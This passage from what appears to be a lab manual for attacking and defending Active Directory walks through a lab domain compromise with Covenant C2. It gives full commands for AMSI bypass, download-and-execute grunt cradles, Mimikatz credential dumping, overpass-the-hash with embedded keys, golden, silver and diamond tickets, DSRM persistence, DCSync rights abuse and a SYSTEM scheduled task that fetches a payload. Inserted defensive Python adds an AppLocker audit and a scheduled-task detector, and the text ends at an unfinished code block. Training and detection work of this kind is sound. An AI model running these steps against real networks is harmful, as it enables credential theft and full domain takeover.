4. Browse the SharpHound.ps1 PowerShell script.
5. Click on Task button.

Task - Setup BloodHound and identify a machine where studentx has local
administrative access.
Run the following PowerShell command to run the BloodHound collector and gather data
about the current domain.
• Note: - For the BloodHound setup, refer to the Lab Manual. Here we cover how to leverage
Covenant C2 to execute the SharpHound.ps1 script and collect the data.
• Command

PowerShell Invoke-BloodHound -CollectionMethod All -Verbose

We can list the files of the current directory and check for *_bloodhound.zip file.
• Command

ls

Now we can download the file from the machine and load the data into the BloodHound UI.
The downloaded data can be found inside the Covenant/Covenant/Data/Downloads/ folder.
• Command

Download 20230319234341_BloodHound.zip

Learning Objective 7
Task

• Identify a machine in the target domain where a Domain Admin session is available.
• Compromise the machine and escalate privileges to Domain Admin
o Using access to dcorp-ci
o Using derivative local admin
Solution
To enumerate the domain environment, we will need to import
the PowerView.ps1 PowerShell script using the PowerShellImport built-in task in Covenant. But
before that we need to run the AMSI bypass using the built-in command BypassAmsi.
We have access to two domain users – studentx and ciadmin – and administrative access to
the dcorp-adminsrv machine. User hunting has not been fruitful as studentx. We got a reverse
shell on dcorp-ci as ciadmin by abusing Jenkins. We will leverage the Jenkins instance for
further enumeration.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the PowerView.ps1 PowerShell script.
5. Click on Task button.

Task - Identify a machine in the target domain where a Domain Admin
session is available.
Once we have uploaded the PowerView.ps1 PowerShell script, we can click on the Interact tab and
execute the command below.
• Command

PowerShell Find-DomainUserLocation

Great! A domain admin is logged in on dcorp-mgmt server. Now, let us check if we (as
ciadmin) have local admin access to dcorp-mgmt which will make it easier for us to attempt
escalation to domain admin.

Task - Compromise the machine and escalate privileges to Domain Admin -
Using access to dcorp-ci.
Let us confirm that we have local admin access on the dcorp-mgmt server and that the PowerShell
Remoting port is open.
• Command

PowerShell Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Now that we know we have local admin rights on the dcorp-mgmt machine, we will
download and execute the PowerShell Launcher to get a new grunt on the dcorp-mgmt machine.
• Command

PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Since we have grunt access with administrative privileges on the dcorp-mgmt machine,
we will now use the built-in task Mimikatz to dump the credentials from the system.
Internally this task uses the SharpSploit library, which in turn wraps Mimikatz. But before
that we need to run the AMSI bypass using the built-in command BypassAmsi.

• Command

Mimikatz "sekurlsa::ekeys"

Sweet! We got credentials of svcadmin – a domain administrator. Note that svcadmin is
used as a service account (see "Session" in the above output), so we can even get
credentials in clear-text from lsasecrets!
Since we have the hash/keys of a domain admin, let us use the built-in Mimikatz task to
perform the OverPass-The-Hash attack. To perform the attack, we need to create a new binary
launcher and host it so that we can download and save it to disk. Below are the
details to create a new binary launcher.
• Launcher Details
1. Click on Launchers Menu.
2. Click on Create button and then click on Create BinaryLauncher.
3. Enter BinaryLauncherStudentVM in the Name Field.
4. Select HTTPListenerStudentVM Listener.
5. Select ModifiedGruntHTTP Implant Template.
6. Select Net40 DotNetVersion.
7. Select the KillDate
8. Keep the other fields at their default values and click on Generate button.

Once the Launcher is generated, we need to host the launcher Binary file.
• Host the Launcher
1. Click on the Host tab in the Binary Launcher Window
2. Add the URL from which the file can be accessed. We have
added /StudentVMGrunt.exe as the URL. We can also add something
like /FolderName/FileName.ps1 to mimic a folder structure.
3. Click on Host button.

To confirm that our file is hosted properly, we can go to the HTTPListenerStudentVM Listener
and open the Hosted Files tab. The StudentVMGrunt.exe file is hosted, as shown in the
screenshot below.

Download the StudentVMGrunt.exe file on the Student VM and save it to disk. We will use
the System privilege grunt for downloading the grunt and then for performing the OverPass-
The-Hash attack.
Note: - We can also use the Upload option to upload our Grunt file to the machine.
• Command

PowerShell iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.exe -OutFile C:\Users\Public\Downloads\StudentVMGrunt.exe

Check if the StudentVMGrunt.exe file is saved on the disk.
• Command

ls C:\Users\Public\Downloads\

Below are the steps to perform OverPass-The-Hash attack using Mimikatz and execute the
Grunt with the AES key of the svcadmin user.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command field.
5. Click on the Task button.

The new Grunt is connected back to our Covenant C2 that has Domain Admin privileges!

We need to add a note to the new Grunt so that we can identify that it has the token of the Domain
Admin user.

Steps

1. Click on the Grunt name in the Grunts page
2. Enter svcadmin user privilege value in Note field.
3. Click on Edit button

Let us try accessing the domain controller from the new Grunt.

• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\C$

Task - Escalate privileges to Domain Admin using derivative local admin.
Moving on to the next task, we need to escalate to domain admin using derivative local
admin. As we already know, we have local admin privileges on the dcorp-adminsrv.dollarcorp.moneycorp.local
machine, so we will try to gain access to that machine. We will use the Student VM Grunt to gain
access to dcorp-adminsrv.dollarcorp.moneycorp.local.
• Command

PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

We were not able to gain access on the dcorp-adminsrv.dollarcorp.moneycorp.local machine; the
error in the screenshot above indicates that we are operating in Constrained Language Mode.
So, let us enumerate the machine over PSRemoting.
Check the PowerShell language mode
• Command

PowerShell Invoke-Command -ScriptBlock {$ExecutionContext.SessionState.LanguageMode} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

We can see in the above screenshot that we are running in a Constrained Language Mode.
So, let us enumerate the AppLocker Policy.
• Command

PowerShell Invoke-Command -ScriptBlock {reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

• Command

PowerShell Invoke-Command -ScriptBlock {Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Looks like AppLocker is configured. After going through the policies, we can understand that
Microsoft signed binaries and scripts are allowed for all users but nothing else.
However, this rule is overly permissive.

A default rule is enabled that allows everyone to run scripts from the C:\Program Files folder!
Here, everyone can run scripts from the Program Files directory. That means we can drop
the PowerShell script in the Program Files directory and execute it.
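The AppLocker finding above is worth generalising into an audit, and the Python below is an added example that is not part of this lab manual or of Covenant. The default path rules let Everyone run scripts from Program Files and the Windows folder; that is only safe while no directory under those roots is writable by standard users (a local administrator, as used in this exercise, can write there by design, which is why AppLocker is not a boundary against admins). The script parses a constructed policy in the layout returned by Get-AppLockerPolicy -Effective -Xml (rule Ids are placeholders) and joins its Everyone and Authenticated Users allow-by-path rules against a constructed list of user-writable directories, as an ACL scan would produce.

```python
import xml.etree.ElementTree as ET

# Constructed AppLocker policy; Ids are placeholders, the two default-rule names and
# paths mirror the stock Script rules. Not exported from the lab.
SAMPLE_POLICY = """<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="placeholder-guid-1" Name="(Default Rule) All scripts located in the Program Files folder"
                  Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="placeholder-guid-2" Name="(Default Rule) All scripts located in the Windows folder"
                  Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="placeholder-guid-3" Name="Administrators may run any script"
                  Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# Constructed result of an ACL scan: directories where standard users hold write access.
SAMPLE_WRITABLE_DIRS = [
    r"C:\Program Files\SomeVendor\Logs",
    r"C:\Windows\Tasks",
    r"C:\Users\Public\Documents",
]

# AppLocker path variables and the concrete roots they stand for.
APPLOCKER_VARS = {
    "%PROGRAMFILES%": [r"C:\Program Files", r"C:\Program Files (x86)"],
    "%SYSTEM32%": [r"C:\Windows\System32"],
    "%WINDIR%": [r"C:\Windows"],
    "%OSDRIVE%": ["C:"],
}

# Well-known SIDs whose rules apply to every ordinary user.
EVERYONE_SIDS = ("S-1-1-0", "S-1-5-11")


def expand_rule_path(path):
    """Turn a rule path into concrete prefixes; a bare '*' matches everything."""
    if path == "*":
        return [""]
    upper = path.upper()
    for var, roots in APPLOCKER_VARS.items():
        if upper.startswith(var):
            return [root + path[len(var):] for root in roots]
    return [path]


def allow_path_rules(policy_xml, collection="Script"):
    """List (name, sid, path) for every Allow FilePathRule in the given collection."""
    root = ET.fromstring(policy_xml)
    rules = []
    for coll in root.findall("RuleCollection"):
        if coll.get("Type") != collection:
            continue
        for rule in coll.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            for cond in rule.findall("Conditions/FilePathCondition"):
                rules.append((rule.get("Name"), rule.get("UserOrGroupSid"), cond.get("Path")))
    return rules


def covered_by(rule_path, directory):
    """True when the directory lies under the rule path; a trailing '*' means 'and below'."""
    for prefix in expand_rule_path(rule_path):
        if directory.lower().startswith(prefix.rstrip("*").lower()):
            return True
    return False


def audit_writable_allow_paths(policy_xml, writable_dirs, sids=EVERYONE_SIDS):
    """Pair each Everyone/Authenticated Users allow-by-path rule with every user-writable
    directory it covers; each pair is a place where a standard user can drop and run a script."""
    findings = []
    for name, sid, path in allow_path_rules(policy_xml):
        if sid not in sids:
            continue
        for directory in writable_dirs:
            if covered_by(path, directory):
                findings.append((name, directory))
    return findings


if __name__ == "__main__":
    for rule_name, directory in audit_writable_allow_paths(SAMPLE_POLICY, SAMPLE_WRITABLE_DIRS):
        print(f"FINDING: '{rule_name}' also allows scripts from writable {directory}")
```

The fix on the policy side is an explicit Deny rule for each writable directory (or a tighter Allow), and on the filesystem side removing the write permission; the audit is only as good as the ACL scan that feeds it, so run that scan as a standard user rather than from an administrative shell.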

Download the StudentVMGrunt.ps1 PowerShell script and save it in the Program Files
directory.
• Command

PowerShell Invoke-Command -ScriptBlock {iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.ps1 -OutFile "C:\Program Files\StudentVMGrunt.ps1"} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Let us check if the file is properly downloaded on the disk.
• Command

PowerShell Invoke-Command -ScriptBlock {ls "C:\Program Files\"} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Now, let us execute the file and check if we can get a new grunt on the machine.
• Command

PowerShell Invoke-Command -ScriptBlock {powershell.exe -File "C:\Program Files\StudentVMGrunt.ps1"} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

AlteredSecurity Attacking and Defending Active Directory 79


Now that we have access to the dcorp-adminsrv.dollarcorp.moneycorp.local machine, we can
extract the credentials from the machine using the built-in Mimikatz task. But first, execute
the built-in BypassAmsi command.
• Command

Mimikatz "sekurlsa::ekeys"

As we can see, we have the hashes and keys of three user accounts.
We will leverage the srvadmin user account AES key to perform the OverPass-The-Hash attack and
gain a new grunt with srvadmin user privilege. We will use the Mimikatz built-in task to perform
the OverPass-The-Hash attack, from the System privilege grunt of the Student VM.
Download the StudentVMGrunt.exe file on the Student VM and save the file to disk.
In our case we already have the file on disk, so we will use the same file. If the file is
not present, we can use the command below to download it.
Note: - We can also use the Upload option to upload our Grunt file to the machine.
• Command

PowerShell iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.exe -OutFile C:\Users\Public\Downloads\StudentVMGrunt.exe

Below are the steps to perform the OverPass-The-Hash attack using Mimikatz and execute the
Grunt with srvadmin privilege.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command field.
5. Click on the Task button.

The new Grunt is connected back to our Covenant C2 with srvadmin user token.

We need to add a note to the new Grunt so that we can identify that it has the token
of the srvadmin user.

Steps

1. Click on the Grunt name in the Grunts page
2. Enter srvadmin user privilege value in Note field.
3. Click on Edit button

Now, let us use Find-PSRemotingLocalAdminAccess.ps1 to check if srvadmin has local
administrator privileges on any other machine in the domain where a domain admin session
is available. We will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell
script using the PowerShellImport built-in task in Covenant. But first, execute the built-in
BypassAmsi command.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.

• Command

PowerShell Find-PSRemotingLocalAdminAccess

We have local admin access on the dcorp-mgmt server as srvadmin and a session of
svcadmin is established on that machine. Let us download and execute the PowerShell
Launcher to get a new grunt of dcorp-mgmt machine.
• Command

PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

We can now extract the credentials from the machine using the built-in Mimikatz task. But
first, execute the built-in BypassAmsi command.
• Command

Mimikatz "sekurlsa::ekeys"

Now we need to perform OverPass-The-Hash again and gain a new grunt with the svcadmin
user's privilege. All the commands below need to be executed on the Student VM from the
elevated grunt.
Download the StudentVMGrunt.exe file on the Student VM and save the file to disk.
In our case we already have the file on disk, so we will use the same file. If the file is
not present, we can use the command below to download it.
Note: - We can also use the Upload option to upload our Grunt file to the machine.
• Command

PowerShell iwr -UseBasicParsing http://172.16.100.226/StudentVMGrunt.exe -OutFile C:\Users\Public\Downloads\StudentVMGrunt.exe

Below are the steps to perform the OverPass-The-Hash attack using Mimikatz and execute the
Grunt with Domain Admin privilege.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command field.
5. Click on the Task button.

The new Grunt is connected back to our Covenant C2 that has Domain Admin privileges!

We need to add a note to the new Grunt to identify that it has the token of the Domain Admin user.

Steps

1. Click on the Grunt name in the Grunts page
2. Enter svcadmin user privilege value in Note field.
3. Click on Edit button

Learning Objective 8
Task

• Extract secrets from the domain controller of dollarcorp.
• Using the secrets of krbtgt account, create a Golden ticket.
• Use the Golden ticket to (once again) get domain admin privileges from a machine.
Solution
Task - Extract secrets from the domain controller of dollarcorp.
From the previous exercise we have domain admin privileges: we dumped hashes and keys
from dcorp-mgmt and used OverPass-The-Hash to get a new Grunt as the domain admin
svcadmin. Let us use the command below to dump all the hashes on the domain controller.
Remember that the commands below need to be executed from the new Grunt that is
running with privileges of DA on your machine 172.16.100.X.
To gain access on the Domain Controller we will leverage PSRemoting and execute
the StudentVMGrunt.ps1 PowerShell script. But first, execute the built-in BypassAmsi command.
• Command

PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Now that we have access on dcorp-dc, let us extract the credentials using the built-in
Mimikatz task. But first, execute the built-in BypassAmsi command.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "lsadump::lsa /patch" value in the Command field.
5. Click on the Task button.

To get the NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack. Run
it from a process running as Domain Admin using the built-in Mimikatz task: follow the steps
above and set the value in the Command field to "lsadump::dcsync /user:dcorp\krbtgt".

Task - Using the secrets of krbtgt account, create a Golden ticket.
Now, on any machine, even one that is not part of the domain, we can use the information from
the above command to create a Golden Ticket. Please note that the krbtgt account password
may be changed, so the hash you get in the lab could be different from the one in this lab
manual.
We need to import the PowerShell version of Mimikatz because the built-in task in Covenant
kills the existing grunt while creating the Golden Ticket. Follow the steps below to
import the PowerShell Mimikatz script. We will currently use the Student VM grunt.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Invoke-Mimi.ps1 PowerShell script.
5. Click on Task button.

Use the below command to create the Golden Ticket.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Task - Use the Golden ticket to (once again) get domain admin privileges
from a machine.
Use the below command to access the filesystem on the domain controller.
• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

We can also run WMI commands on the DC:
• Command

PowerShell gwmi -Class win32_computersystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Learning Objective 9
Task

• Try to get command execution on the domain controller by creating silver ticket for:
o HOST service
o WMI
Solution
Task - Get command execution on the domain controller by creating silver
ticket for HOST service.
From the information gathered in the previous steps we have the hash of the machine account of
the domain controller (dcorp-dc). Using the command below, we can create a Silver Ticket
that gives us access to the HOST service of the DC. Please note that the hash of
dcorp-dc (RC4 in the command below) may be different in the lab. We will use the
PowerShell script of Mimikatz to create the Silver Ticket.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1be12164a06b817e834eb437dc8f581c /user:Administrator /ptt"'

Create a new scheduled task and execute it to get the new grunt on the dcorp-dc machine. We
will leverage the StudentVMGrunt.exe that is already hosted.
• Command

ShellCmd schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User2" /TR "powershell.exe -c 'iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.exe -OutFile C:\Users\Public\StudentVMGrunt.exe; Start-Process C:\Users\Public\StudentVMGrunt.exe;'"
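Creating a task this way is recorded on the DC as Security event 4698 (A scheduled task was created, in the Other Object Access Events audit subcategory), and the event carries the full task XML, so the principal and the action can be inspected without touching the host. The Python below is an added detection example that is not part of this lab manual or of Covenant: it scores constructed 4698 records (task names, the URL and the file paths are placeholders) by whether the task runs as SYSTEM, launches a script host, and fetches content from the network.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML, which is what 4698 carries in TaskContent.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed 4698 records; the staging URL, task names and paths are placeholders.
SAMPLE_4698 = [
    {"Computer": "DC01", "SubjectUserName": "Administrator", "TaskName": "\\Maint2",
     "TaskContent": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-c 'iwr -UseBasicParsing http://staging.invalid/agent.exe -OutFile C:\\Users\\Public\\agent.exe; Start-Process C:\\Users\\Public\\agent.exe'</Arguments>
  </Exec></Actions>
</Task>"""},
    {"Computer": "SRV01", "SubjectUserName": "svc_backup", "TaskName": "\\Vendor\\NightlyBackup",
     "TaskContent": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Vendor\\backup.exe</Command><Arguments>--full</Arguments></Exec></Actions>
</Task>"""},
]

SCRIPT_HOSTS = {"powershell.exe", "powershell", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
NETWORK_FETCH = re.compile(
    r"iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|https?://|"
    r"start-bitstransfer|certutil", re.I)


def task_actions(task_xml):
    """Return (principal SIDs, [(command, arguments)]) parsed from the task XML."""
    root = ET.fromstring(task_xml)
    sids = [u.text for u in root.findall(".//t:Principals/t:Principal/t:UserId", TASK_NS)]
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        actions.append((cmd, args))
    return sids, actions


def score_task_event(ev):
    """Return (score, reasons). Each heuristic is weak alone; together they single out
    a SYSTEM task whose only job is to pull and run something from the network."""
    sids, actions = task_actions(ev["TaskContent"])
    score, reasons = 0, []
    if "S-1-5-18" in sids:
        score += 1
        reasons.append("runs as SYSTEM")
    for cmd, args in actions:
        exe = cmd.replace("\\", "/").split("/")[-1].lower()
        if exe in SCRIPT_HOSTS:
            score += 2
            reasons.append(f"action is a script host ({exe})")
        if NETWORK_FETCH.search(args):
            score += 3
            reasons.append("arguments fetch content from the network")
    return score, reasons


def suspicious_task_creations(events, threshold=4):
    """Return (host, task name, creator, reasons) for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_task_event(ev)
        if score >= threshold:
            hits.append((ev["Computer"], ev["TaskName"], ev["SubjectUserName"], reasons))
    return hits


if __name__ == "__main__":
    for host, name, creator, reasons in suspicious_task_creations(SAMPLE_4698):
        print(f"ALERT: {host} task {name} created by {creator}: {'; '.join(reasons)}")
```

4698 is only written when the subcategory is audited, so confirm that on domain controllers first; the Microsoft-Windows-TaskScheduler/Operational log records registration independently of the Security audit policy and is a useful second source. A task created by a Domain Admin from an IP that is not a management host is the triage question this alert should lead to.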

Run the newly created scheduled task on the dcorp-dc machine to gain a new grunt on dcorp-dc.
• Command

ShellCmd schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "User2"

Task - Get command execution on the domain controller by creating silver
ticket for WMI service.
For accessing WMI, we need to create two tickets – one for HOST service and another for
RPCSS.
Let us create the silver ticket for RPCSS Service as we have already created the ticket for
HOST service above.
• Command

PowerShell Invoke-Mimi -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c /user:Administrator /ptt"'

Once both the tickets are created, we can run commands on the DC using WMI.
• Command

PowerShell gwmi -Class win32_computersystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Learning Objective 10
Task

• Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.
Solution
Task - Use Domain Admin privileges obtained earlier to execute the Diamond
Ticket attack.
We can simply use the following Rubeus command to execute the attack. Note that the
version of Rubeus bundled with Covenant is an old build, so we will need to use the new
version of Rubeus to inject the ticket. We will use the Assembly task to do this, from the
System privilege grunt on the Student VM.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Assembly from the GruntTask.
4. Browse the Rubeus.exe file.
5. Enter Rubeus.exe value in AssemblyName field.
6. Enter diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:student2 /password:PBKZZhYvtAQ5TYa4 /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Users\Public\Downloads\StudentVMGrunt.exe /show /ptt value in Parameters field.
7. Click on Task button.

We need to add a note to the new Grunt so that we can identify that it has the token
of the administrator user.

Steps

1. Click on the Grunt name in the Grunts page
2. Enter administrator user privilege value in Note field.
3. Click on Edit button

Learning Objective 11
Task

• Use Domain Admin privileges obtained earlier to abuse the DSRM credential for
persistence.
Solution
Task - Use Domain Admin privileges obtained earlier to abuse the DSRM
credential for persistence.
Once we have Domain Admin privileges, we can persist with administrative access on the DC
by abusing the DSRM administrator. With the domain admin privileges obtained earlier, let
us extract the credentials from the SAM file on the DC. The Directory Services Restore
Mode (DSRM) password is mapped to the local Administrator on the DC. To extract
the DSRM hash we will leverage the built-in Mimikatz task, using the existing grunt that
we have on dcorp-dc.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "token::elevate" "lsadump::sam" value in the Command field.
5. Click on Task button.

The DSRM administrator is not allowed to log on to the DC from the network. So, we need to
change the logon behavior for the account by modifying the registry on the DC. We can use the
command below to modify the logon behavior so that network logon is allowed.
• Command

PowerShell New-ItemProperty
"HKLM:\System\CurrentControlSet\Control\Lsa\" -Name
"DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Now, from our Student VM grunt, we can perform the OverPass-The-Hash attack using Mimikatz
for the DSRM administrator. All the commands below need to be executed on the Student
VM from the elevated grunt.
Download the StudentVMGrunt.exe file on the Student VM and save the file to disk.
In our case we already have the file on disk, so we will use the same file. If the file is
not present, we can use the command below to download it.
Note: - We can also use the Upload option to upload our Grunt file to the machine.
• Command

PowerShell iwr -UseBasicParsing http://172.16.100.2/StudentVMGrunt.exe -OutFile C:\Users\Public\Downloads\StudentVMGrunt.exe

Below are the steps to perform OverPass-The-Hash attack using Mimikatz and execute the
Grunt with Domain Admin privilege.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:administrator /domain:dcorp-dc /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command field.
5. Click on the Task button.

The new Grunt is connected back to our Covenant C2 that has Administrator user privileges!

We need to add a note to the new Grunt to identify that it has the token of the Domain Admin user.

Steps

1. Click on the Grunt name in the Grunts page
2. Enter Grunt spawned with DSRM creds value in Note field.
3. Click on Edit button

We can now access the dcorp-dc directly from the new grunt.
• Command

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Learning Objective 12
Task

• Check if studentx has Replication (DCSync) rights.
• If yes, execute the DCSync attack to pull hashes of the krbtgt user.
• If no, add the replication rights for the studentx and execute the DCSync attack to pull
hashes of the krbtgt user.
Solution
Task - Check if studentx has Replication (DCSync) rights.
We can check if studentx has replication rights using the following PowerView command.
We will use Student VM to enumerate.
Note: - We might need to import the PowerView.ps1 script again.
• Command

PowerShell Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student2"}

Task - Add the replication rights for the studentx and execute the DCSync
attack to pull hashes of the krbtgt user.
As we can see in the above screenshot, the output is blank, which means student2 does not
have the rights to perform replication. Hence, we will grant those rights using the following
command from the dcorp-dc grunt. We will need to import the PowerView.ps1 PowerShell
script to perform this activity; the steps for importing the PowerView.ps1 PowerShell script can
be found in the section above.

AlteredSecurity Attacking and Defending Active Directory 121


• Command

PowerShell Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student2 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Let us check for the rights once again from our normal student user grunt. If you get any errors while trying the command below, run the RevertToSelf command and then try the command again.
• Command

PowerShell Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student2"}

As we can see above, the current user now has the rights to perform the DCSync attack. We will use the Built-in Mimikatz task to perform the DCSync attack and extract the KRBTGT account hash.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select Mimikatz from the GruntTask.
4. Enter "lsadump::dcsync /user:dcorp\krbtgt" in the Command field.
5. Click on Task button.
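
The replication rights checked above are also what a defender watches for. As an added example (not part of the lab manual or of Covenant), the Python below runs two checks over constructed Security-log events: a 5136 on the domain object's nTSecurityDescriptor, which is the footprint of Add-DomainObjectAcl -Rights DCSync, and a 4662 whose Properties field carries the DS-Replication-Get-Changes GUIDs from an account that is not an approved replicator. The event dictionaries and the APPROVED_REPLICATORS list are assumptions made for the sample; the GUIDs are the well-known schema values.

```python
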